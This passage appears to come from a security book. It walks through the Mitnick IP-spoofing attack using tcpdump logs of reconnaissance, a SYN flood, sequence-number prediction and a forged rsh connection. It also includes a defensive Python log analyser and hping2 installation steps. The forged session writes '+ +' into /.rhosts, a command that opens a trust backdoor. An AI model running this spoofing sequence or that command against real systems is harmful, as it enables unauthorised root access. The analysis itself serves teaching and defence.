Document information: 56 pages, 828.45 KB.

Contents
As can be seen from the following logs, the attack began with suspicious probes from a privileged root account on toad.com. (Remember, the attacker's intent is to locate an initial target with some form of internal network trust relationship.) As Shimomura pointed out, it is obvious from the particular service probes that Mitnick was seeking an exploitable trust relationship here:

    14:09:32 toad.com# finger -l @target
    14:10:21 toad.com# finger -l @server
    14:10:50 toad.com# finger -l root@server
    14:11:07 toad.com# finger -l @x-terminal
    14:11:38 toad.com# showmount -e x-terminal
    14:11:49 toad.com# rpcinfo -p x-terminal
    14:12:05 toad.com# finger -l root@x-terminal

Fingering an account (-l for long or extensive output) returns useful discovery information about that account. Although the information returned varies from daemon to daemon and account to account, on some systems finger reports whether the user is currently in session. Other systems return information that includes the user's full name, address, and/or telephone number(s). The finger process is relatively simple: a finger client issues an active open to TCP port 79 and sends a one-line query with login data. The server processes the query, returns the output, and closes the connection. The output received from port 79 is considered very sensitive, as it can reveal detailed information on users.

The second command shown in the foregoing log excerpt is showmount (with the -e option); it is typically used to show how an NFS server is exporting its file systems. It also works over the network, indicating exactly what an NFS client is being offered. The rpcinfo command (with the -p option) is a Portmap query. The Portmap daemon converts RPC program numbers into port numbers. When an RPC server starts up, it registers with the Portmap daemon: the server tells the daemon which port number it is listening on and which RPC program numbers it serves.
Therefore, the Portmap daemon knows the location of every registered port on the host and which programs are available on each of these ports.

The next log excerpt is the result of a TCP SYN attack on port 513 of the server from a phony address, 130.92.6.97. TCP port 513, login, is considered a "privileged" port; as such, it has become a target for address spoofing. The three-way handshake (SYN, SYN-ACK, ACK) is how a connection is established between two nodes during a TCP session; it is necessary for unambiguous synchronization of both ends of the connection. This process allows both sides to agree upon a number sequencing method for tracking bytes within the communication streams in both directions. The first node requests communication by sending a packet with a sequence number and the SYN bit set. The second node responds with an ACK that contains the first node's sequence number plus 1, together with its own sequence number. At this point, the first node responds and communication between the two nodes proceeds. When there is no more data to send, a TCP node may send a FIN bit, indicating a close control signal.

In this case, the source IP address in the packet is spoofed, or replaced, with an address that is not in use on the Internet (or that belongs to another computer which will not answer). An attacker sends numerous TCP SYNs to tie up resources on the target system. Upon receiving each connection request, the target server allocates resources to handle and track the new communication session; it then responds with a SYN-ACK. The response is sent to the spoofed, or nonexistent, IP address, which therefore never answers. As a result, no response is received to the SYN-ACK.
The target eventually gives up waiting for a response and releases the resources that were set aside earlier; until it does, its connection queue for that port remains full:

    14:18:22.516699 130.92.6.97.600 > server.login: S 1382726960:1382726960(0) win 4096
    14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0) win 4096
    14:18:22.744477 130.92.6.97.602 > server.login: S 1382726962:1382726962(0) win 4096
    14:18:22.830111 130.92.6.97.603 > server.login: S 1382726963:1382726963(0) win 4096
    14:18:22.886128 130.92.6.97.604 > server.login: S 1382726964:1382726964(0) win 4096
    14:18:22.943514 130.92.6.97.605 > server.login: S 1382726965:1382726965(0) win 4096
    14:18:23.002715 130.92.6.97.606 > server.login: S 1382726966:1382726966(0) win 4096
    14:18:23.103275 130.92.6.97.607 > server.login: S 1382726967:1382726967(0) win 4096
    14:18:23.162781 130.92.6.97.608 > server.login: S 1382726968:1382726968(0) win 4096
    14:18:23.225384 130.92.6.97.609 > server.login: S 1382726969:1382726969(0) win 4096
    14:18:23.282625 130.92.6.97.610 > server.login: S 1382726970:1382726970(0) win 4096
    14:18:23.342657 130.92.6.97.611 > server.login: S 1382726971:1382726971(0) win 4096
    14:18:23.403083 130.92.6.97.612 > server.login: S 1382726972:1382726972(0) win 4096
    14:18:23.903700 130.92.6.97.613 > server.login: S 1382726973:1382726973(0) win 4096
    14:18:24.003252 130.92.6.97.614 > server.login: S 1382726974:1382726974(0) win 4096
    14:18:24.084827 130.92.6.97.615 > server.login: S 1382726975:1382726975(0) win 4096
    14:18:24.142774 130.92.6.97.616 > server.login: S 1382726976:1382726976(0) win 4096
    14:18:24.203195 130.92.6.97.617 > server.login: S 1382726977:1382726977(0) win 4096
    14:18:24.294773 130.92.6.97.618 > server.login: S 1382726978:1382726978(0) win 4096
    14:18:24.382841 130.92.6.97.619 > server.login: S 1382726979:1382726979(0) win 4096
    14:18:24.443309 130.92.6.97.620 > server.login: S 1382726980:1382726980(0) win 4096
    14:18:24.643249 130.92.6.97.621 > server.login: S 1382726981:1382726981(0) win 4096
    14:18:24.906546 130.92.6.97.622 > server.login: S 1382726982:1382726982(0) win 4096
    14:18:24.963768 130.92.6.97.623 > server.login: S 1382726983:1382726983(0) win 4096
    14:18:25.022853 130.92.6.97.624 > server.login: S 1382726984:1382726984(0) win 4096
    14:18:25.153536 130.92.6.97.625 > server.login: S 1382726985:1382726985(0) win 4096
    14:18:25.400869 130.92.6.97.626 > server.login: S 1382726986:1382726986(0) win 4096
    14:18:25.483127 130.92.6.97.627 > server.login: S 1382726987:1382726987(0) win 4096
    14:18:25.599582 130.92.6.97.628 > server.login: S 1382726988:1382726988(0) win 4096
    14:18:25.653131 130.92.6.97.629 > server.login: S 1382726989:1382726989(0) win 4096

Shimomura next identified 20 connection attempts from apollo.it.luc.edu to the X terminal's shell port and indicated their purpose: they were meant to reveal the behavior of the X terminal's TCP sequence numbering. Each attempt is reset immediately (the R packets) to avoid flooding the X terminal's connection queue. The initial sequence numbers of the probes are incremented by 1 for each connection, indicating that the SYN packets were not being generated by the system's TCP implementation.
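As an added example (not from the book), the following Python script shows how a defender would check the two things this chapter's logs establish: it parses tcpdump lines in the format quoted on this page, measures how x-terminal's SYN-ACK initial sequence numbers advance between connections, tests whether the bare ACK of the later spoofed server.login connection acknowledges exactly the predicted next ISN plus one, and counts half-open SYNs per source as a flood indicator. The sample lines are copied (abridged) from the page's own excerpt; the function names and the "most common delta" heuristic are this example's own choices and generalize to any capture in this format.

```python
import re
from collections import Counter

# Lines copied from the log excerpt on this page (abridged: two flood SYNs,
# probes 1000, 999, 998 and 981, then the spoofed server.login connection).
SAMPLE_LOG = """\
14:18:22.516699 130.92.6.97.600 > server.login: S 1382726960:1382726960(0) win 4096
14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0) win 4096
14:18:25.906002 apollo.it.luc.edu.1000 > x-terminal.shell: S 1382726990:1382726990(0) win 4096
14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000: S 2021824000:2021824000(0) ack 1382726991 win 4096
14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell: R 1382726991:1382726991(0) win 0
14:18:26.507560 apollo.it.luc.edu.999 > x-terminal.shell: S 1382726991:1382726991(0) win 4096
14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999: S 2021952000:2021952000(0) ack 1382726992 win 4096
14:18:26.775037 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0
14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell: S 1382726992:1382726992(0) win 4096
14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998: S 2022080000:2022080000(0) ack 1382726993 win 4096
14:18:27.251840 apollo.it.luc.edu.998 > x-terminal.shell: R 1382726993:1382726993(0) win 0
14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S 1382727009:1382727009(0) win 4096
14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096
14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R 1382727010:1382727010(0) win 0
14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096
14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096
"""

# Format of the lines above: "<time> <host.port> > <host.port>: <flags> [seq:end(len)] [ack N] win W"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) > (?P<dst>\S+): (?P<flags>[SRPF.]+)"
    r"(?: (?P<seq>\d+):\d+\(\d+\))?(?: ack (?P<ack>\d+))? win (?P<win>\d+)$")

def parse(line):
    """One tcpdump line -> dict, or None if the line is not in the format above."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    pkt = m.groupdict()
    pkt["src_host"], pkt["src_port"] = pkt["src"].rsplit(".", 1)  # host.port
    pkt["dst_host"], pkt["dst_port"] = pkt["dst"].rsplit(".", 1)
    for k in ("seq", "ack", "win"):
        pkt[k] = None if pkt[k] is None else int(pkt[k])
    return pkt

def parse_log(text):
    return [p for p in map(parse, text.splitlines()) if p]

def synack_isns(pkts, host):
    """Initial sequence numbers `host` chose in its SYN-ACK replies, in order seen."""
    return [p["seq"] for p in pkts
            if p["src_host"] == host and "S" in p["flags"] and p["ack"] is not None]

def isn_step(isns):
    """Per-connection ISN increment, or None when the ISNs look unpredictable.
    The most common delta is the step; every delta must be a whole multiple of it
    (an abridged capture skips connections, so larger deltas are still multiples)."""
    deltas = [b - a for a, b in zip(isns, isns[1:])]
    if not deltas:
        return None
    step = Counter(deltas).most_common(1)[0][0]
    if step <= 0 or any(d % step for d in deltas):
        return None
    return step

def spoof_matches_prediction(pkts, host):
    """True if some bare ACK sent to `host` acknowledges (last seen ISN + step) + 1:
    a third handshake packet built from a predicted ISN rather than from a SYN-ACK
    present in the capture, which is what a blind spoofed connection looks like."""
    isns = synack_isns(pkts, host)
    step = isn_step(isns)
    if step is None:
        return False
    predicted = isns[-1] + step
    return any(p["dst_host"] == host and p["flags"] == "." and p["ack"] == predicted + 1
               for p in pkts)

def half_open_syns(pkts):
    """SYNs per source host that no later packet from the same source port follows
    (no ACK, no RST): the pattern of the flood against server.login."""
    counts = Counter()
    for i, p in enumerate(pkts):
        if p["flags"] == "S" and p["ack"] is None:
            if not any(q["src"] == p["src"] for q in pkts[i + 1:]):
                counts[p["src_host"]] += 1
    return counts

if __name__ == "__main__":
    pkts = parse_log(SAMPLE_LOG)
    print("x-terminal ISN step:", isn_step(synack_isns(pkts, "x-terminal")))
    print("spoofed ACK used a predicted ISN:", spoof_matches_prediction(pkts, "x-terminal"))
    print("half-open SYNs by source:", dict(half_open_syns(pkts)))
```

The apollo probes are not counted as half-open because each is followed by the attacker's own RST from the same port, which is exactly why the probing did not fill x-terminal's queue.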
Note the X terminal SYN-ACK packets' analogous sequence incrementation (in this log, each new connection's initial sequence number is exactly 128,000 higher than the previous one), as follows:

    14:18:25.906002 apollo.it.luc.edu.1000 > x-terminal.shell: S 1382726990:1382726990(0) win 4096
    14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000: S 2021824000:2021824000(0) ack 1382726991 win 4096
    14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell: R 1382726991:1382726991(0) win 0
    14:18:26.507560 apollo.it.luc.edu.999 > x-terminal.shell: S 1382726991:1382726991(0) win 4096
    14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999: S 2021952000:2021952000(0) ack 1382726992 win 4096
    14:18:26.775037 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0
    14:18:26.775395 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0
    14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell: S 1382726992:1382726992(0) win 4096
    14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998: S 2022080000:2022080000(0) ack 1382726993 win 4096
    14:18:27.251840 apollo.it.luc.edu.998 > x-terminal.shell: R 1382726993:1382726993(0) win 0
    14:18:27.544069 apollo.it.luc.edu.997 > x-terminal.shell: S 1382726993:1382726993(0) win 4096
    14:18:27.714932 x-terminal.shell > apollo.it.luc.edu.997: S 2022208000:2022208000(0) ack 1382726994 win 4096
    14:18:27.794456 apollo.it.luc.edu.997 > x-terminal.shell: R 1382726994:1382726994(0) win 0
    14:18:28.054114 apollo.it.luc.edu.996 > x-terminal.shell: S 1382726994:1382726994(0) win 4096
    14:18:28.224935 x-terminal.shell > apollo.it.luc.edu.996: S 2022336000:2022336000(0) ack 1382726995 win 4096
    14:18:28.305578 apollo.it.luc.edu.996 > x-terminal.shell: R 1382726995:1382726995(0) win 0
    14:18:28.564333 apollo.it.luc.edu.995 > x-terminal.shell: S 1382726995:1382726995(0) win 4096
    14:18:28.734953 x-terminal.shell > apollo.it.luc.edu.995: S 2022464000:2022464000(0) ack 1382726996 win 4096
    14:18:28.811591 apollo.it.luc.edu.995 > x-terminal.shell: R 1382726996:1382726996(0) win 0
    14:18:29.074990 apollo.it.luc.edu.994 > x-terminal.shell: S 1382726996:1382726996(0) win 4096
    14:18:29.274572 x-terminal.shell > apollo.it.luc.edu.994: S 2022592000:2022592000(0) ack 1382726997 win 4096
    14:18:29.354139 apollo.it.luc.edu.994 > x-terminal.shell: R 1382726997:1382726997(0) win 0
    14:18:29.354616 apollo.it.luc.edu.994 > x-terminal.shell: R 1382726997:1382726997(0) win 0
    14:18:29.584705 apollo.it.luc.edu.993 > x-terminal.shell: S 1382726997:1382726997(0) win 4096
    14:18:29.755054 x-terminal.shell > apollo.it.luc.edu.993: S 2022720000:2022720000(0) ack 1382726998 win 4096
    14:18:29.840372 apollo.it.luc.edu.993 > x-terminal.shell: R 1382726998:1382726998(0) win 0
    14:18:30.094299 apollo.it.luc.edu.992 > x-terminal.shell: S 1382726998:1382726998(0) win 4096
    14:18:30.265684 x-terminal.shell > apollo.it.luc.edu.992: S 2022848000:2022848000(0) ack 1382726999 win 4096
    14:18:30.342506 apollo.it.luc.edu.992 > x-terminal.shell: R 1382726999:1382726999(0) win 0
    14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell: S 1382726999:1382726999(0) win 4096
    14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991: S 2022976000:2022976000(0) ack 1382727000 win 4096
    14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell: R 1382727000:1382727000(0) win 0
    14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell: S 1382727000:1382727000(0) win 4096
    14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990: S 2023104000:2023104000(0) ack 1382727001 win 4096
    14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell: R 1382727001:1382727001(0) win 0
    14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell: S 1382727001:1382727001(0) win 4096
    14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989: S 2023232000:2023232000(0) ack 1382727002 win 4096
    14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell: R 1382727002:1382727002(0) win 0
    14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell: S 1382727002:1382727002(0) win 4096
    14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988: S 2023360000:2023360000(0) ack 1382727003 win 4096
    14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell: R 1382727003:1382727003(0) win 0
    14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell: S 1382727003:1382727003(0) win 4096
    14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987: S 2023488000:2023488000(0) ack 1382727004 win 4096
    14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell: R 1382727004:1382727004(0) win 0
    14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell: S 1382727004:1382727004(0) win 4096
    14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986: S 2023616000:2023616000(0) ack 1382727005 win 4096
    14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell: R 1382727005:1382727005(0) win 0
    14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell: S 1382727005:1382727005(0) win 4096
    14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985: S 2023744000:2023744000(0) ack 1382727006 win 4096
    14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell: R 1382727006:1382727006(0) win 0
    14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell: S 1382727006:1382727006(0) win 4096
    14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984: S 2023872000:2023872000(0) ack 1382727007 win 4096
    14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell: R 1382727007:1382727007(0) win 0
    14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell: S 1382727007:1382727007(0) win 4096
    14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983: S 2024000000:2024000000(0) ack 1382727008 win 4096
    14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell: R 1382727008:1382727008(0) win 0
    14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell: S 1382727008:1382727008(0) win 4096
    14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982: S 2024128000:2024128000(0) ack 1382727009 win 4096
    14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell: R 1382727009:1382727009(0) win 0
    14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S 1382727009:1382727009(0) win 4096
    14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096
    14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R 1382727010:1382727010(0) win 0

Next, we witness the forged connection requests from the masqueraded server (login port) to the X terminal, using the sequencing predicted by the attacker. This prediction is based on the previous discovery of the X terminal's TCP sequencing. With this spoof, the attacker (in this case, Mitnick) controls a connection to the X terminal's shell port that appears to come from the server's login port:

    14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096
    14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096
    14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096
    14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096
    14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096
    14:18:37 server# rsh x-terminal "echo + + >>/.rhosts"
    14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096
    14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096
    14:18:43.165874 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096
    14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096
    14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0) win 4096

Then, the flood connections are reset to empty the connection queue of the server's login port, so that connections may again be accepted:

    14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096
    14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0) win 4096
    14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0) win 4096
    14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0) win 4096
    14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0) win 4096
    14:18:52.600899 130.92.6.97.605 > server.login: R 1382726965:1382726965(0) win 4096
    14:18:52.660231 130.92.6.97.606 > server.login: R 1382726966:1382726966(0) win 4096
    14:18:52.717495 130.92.6.97.607 > server.login: R 1382726967:1382726967(0) win 4096
    14:18:52.776502 130.92.6.97.608 > server.login: R 1382726968:1382726968(0) win 4096
    14:18:52.836536 130.92.6.97.609 > server.login: R 1382726969:1382726969(0) win 4096
    14:18:52.937317 130.92.6.97.610 > server.login: R 1382726970:1382726970(0) win 4096
    14:18:52.996777 130.92.6.97.611 > server.login: R 1382726971:1382726971(0) win 4096
    14:18:53.056758 130.92.6.97.612 > server.login: R 1382726972:1382726972(0) win 4096
    14:18:53.116850 130.92.6.97.613 > server.login: R 1382726973:1382726973(0) win 4096
    14:18:53.177515 130.92.6.97.614 > server.login: R 1382726974:1382726974(0) win 4096
    14:18:53.238496 130.92.6.97.615 > server.login: R 1382726975:1382726975(0) win 4096
    14:18:53.297163 130.92.6.97.616 > server.login: R 1382726976:1382726976(0) win 4096
    14:18:53.365988 130.92.6.97.617 > server.login: R 1382726977:1382726977(0) win 4096
    14:18:53.437287 130.92.6.97.618 > server.login: R 1382726978:1382726978(0) win 4096
    14:18:53.496789 130.92.6.97.619 > server.login: R 1382726979:1382726979(0) win 4096
    14:18:53.556753 130.92.6.97.620 > server.login: R 1382726980:1382726980(0) win 4096
    14:18:53.616954 130.92.6.97.621 > server.login: R 1382726981:1382726981(0) win 4096
    14:18:53.676828 130.92.6.97.622 > server.login: R 1382726982:1382726982(0) win 4096
    14:18:53.736734 130.92.6.97.623 > server.login: R 1382726983:1382726983(0) win 4096
    14:18:53.796732 130.92.6.97.624 > server.login: R 1382726984:1382726984(0) win 4096
    14:18:53.867543 130.92.6.97.625 > server.login: R 1382726985:1382726985(0) win 4096
    14:18:53.917466 130.92.6.97.626 > server.login: R 1382726986:1382726986(0) win 4096
    14:18:53.976769 130.92.6.97.627 > server.login: R 1382726987:1382726987(0) win 4096
    14:18:54.039039 130.92.6.97.628 > server.login: R 1382726988:1382726988(0) win 4096
    14:18:54.097093 130.92.6.97.629 > server.login: R 1382726989:1382726989(0) win 4096

Soon after gaining root access through IP address spoofing, Mitnick compiled a kernel module that was forced onto an existing STREAMS stack and was intended to take control of a tty (terminal) device.

System Requirements

The following are the minimum system requirements for hping/2:

- Linux, FreeBSD, NetBSD, OpenBSD, or Solaris.
- 3.5 MB of free hard disk space.
- With Linux, uid 0 (root) is required; with FreeBSD, NetBSD, and OpenBSD, the libpcap library and the gmake utility are required.

Linux Installation and Configuration

After downloading or copying the file hping2.0.0-rc1.tar.gz to a directory on your hard drive, follow these steps for Linux systems:

Step 1. Open a terminal session and cd to the partition or directory where you placed the program file.

Step 2. The file probably carries the .gz extension and must be uncompressed with the gzip command. Type gzip -d hping2.0.0-rc1.tar.gz.

Step 3. The installation file will be uncompressed and the .gz extension removed, leaving only hping2.0.0-rc1.tar.
Extract this tar archive by issuing the following tar command: tar xvf hping2.0.0-rc1.tar.

Step 4. The program files will be extracted into an hping2 directory. Change to the new directory by typing cd hping2. In that directory, you can issue the ls command to see its contents, shown here:

    # ls
    AUTHORS          getusec.c           memlockall.c    sendip.c
    binding.c        globals.h           memlock.c       sendip_handler.c
    BUGS             hcmp.h              memstr.c        sendrawip.c
    byteorder.c      hgetopt.c           memunlockall.c  sendtcp.c
    CHANGES          hgetopt.h           memunlock.c     sendudp.c
    cksum.c          hping2.h            MIRRORS         signal.c
    configure        if_promisc.c        NEWS            sockopt.c
    COPYING          INSTALL             opensockraw.c   statistics.c
    CVS              ip_opt_build.c      parseoptions.c  TODO
    datafiller.c     KNOWN-BUGS          README          usage.c
    datahandler.c    libpcap_stuff.c     release.h       utils
    display_ipopt.c  linux_sockpacket.c  relid.c         version.c
    docs             listen.c            resolve.c       waitpacket.c
    gethostname.c    logicmp.c           rtt.c
    getifname.c      main.c              sendhcmp.c
    getlhs.c         Makefile.in         sendicmp.c

Step 5. You'll need to configure the software by issuing the ./configure command. You can view its help by typing ./configure --help, which prints the following notice:

    # ./configure --help
    configure help:
    --help                  show this help
    --force-libpcap         build a libpcap based binary under linux
    --dont-limit-when-suid  when suid allows to use all options even if uid != euid

Complete this step by issuing the configure command as shown here:

    # ./configure
    build byteorder.c
    create byteorder.h
    ---------------------------------
    system type: LINUX
    LIMITWHENSUID: -DLIMITWHENSUID
    FORCE_LIBPCAP:
    LIBPCAP      :
    PCAP_INCLUDE :
    MANPATH      : /usr/local/man
    (to modify try configure --help)
    ---------------------------------
    creating Makefile
    now you can try 'make'

NOTE: You'll need root privileges to complete the installation. If you've logged in with a user account, simply issue the su command and enter the root password to gain these privileges.

Step 6.
Build and install the package by issuing the make command, shown here:

    # make all
    gcc -c -O2 -Wall -g -DLIMITWHENSUID main.c
    main.c: In function 'main':
    main.c:229: warning: implicit declaration of function 'time'
    gcc -c -O2 -Wall -g -DLIMITWHENSUID getifname.c
    getifname.c: In function 'get_if_name':
    getifname.c:141: warning: implicit declaration of function 'exit'
    gcc -c -O2 -Wall -g -DLIMITWHENSUID getlhs.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID linux_sockpacket.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID parseoptions.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID datafiller.c
    datafiller.c: In function 'datafiller':
    datafiller.c:74: warning: implicit declaration of function 'exit'
    gcc -c -O2 -Wall -g -DLIMITWHENSUID datahandler.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID gethostname.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID binding.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID getusec.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID opensockraw.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID logicmp.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID waitpacket.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID resolve.c
    resolve.c: In function 'resolve':
    resolve.c:37: warning: implicit declaration of function 'exit'
    gcc -c -O2 -Wall -g -DLIMITWHENSUID sendip.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID sendicmp.c
    sendicmp.c: In function 'send_icmp_echo':
    sendicmp.c:95: warning: implicit declaration of function 'time'
    gcc -c -O2 -Wall -g -DLIMITWHENSUID sendudp.c
    sendudp.c: In function 'send_udphdr':
    sendudp.c:72: warning: implicit declaration of function 'time'
    gcc -c -O2 -Wall -g -DLIMITWHENSUID sendtcp.c
    sendtcp.c: In function 'send_tcphdr':
    sendtcp.c:91: warning: implicit declaration of function 'time'
    gcc -c -O2 -Wall -g -DLIMITWHENSUID cksum.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID statistics.c
    statistics.c: In function 'print_statistics':
    statistics.c:46: warning: implicit declaration of function 'exit'
    gcc -c -O2 -Wall -g -DLIMITWHENSUID usage.c
    usage.c: In function 'show_usage':
    usage.c:90: warning: implicit declaration of function 'exit'
    gcc -c -O2 -Wall -g -DLIMITWHENSUID version.c
    version.c: In function 'show_version':
    version.c:24: warning: implicit declaration of function 'exit'
    gcc -c -O2 -Wall -g -DLIMITWHENSUID hgetopt.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID sockopt.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID listen.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID sendhcmp.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID memstr.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID rtt.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID relid.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID sendip_handler.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID libpcap_stuff.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID memlockall.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID memunlockall.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID memlock.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID memunlock.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID ip_opt_build.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID display_ipopt.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID sendrawip.c
    gcc -c -O2 -Wall -g -DLIMITWHENSUID signal.c
    gcc -o hping2 -O2 -Wall -g main.o getifname.o getlhs.o linux_sockpacket.o parseoptions.o datafiller.o datahandler.o gethostname.o binding.o getusec.o opensockraw.o logicmp.o waitpacket.o resolve.o sendip.o sendicmp.o sendudp.o sendtcp.o cksum.o statistics.o usage.o version.o hgetopt.o sockopt.o listen.o sendhcmp.o memstr.o rtt.o relid.o sendip_handler.o libpcap_stuff.o memlockall.o memunlockall.o memlock.o memunlock.o ip_opt_build.o display_ipopt.o sendrawip.o signal.o
    ./hping2 -v
    hping version 2.0.0 release candidate 1 ($date:$)
    linux sockpacket based binary
    use 'make strip' to strip hping2 binary
    use 'make install' to install hping2

[...]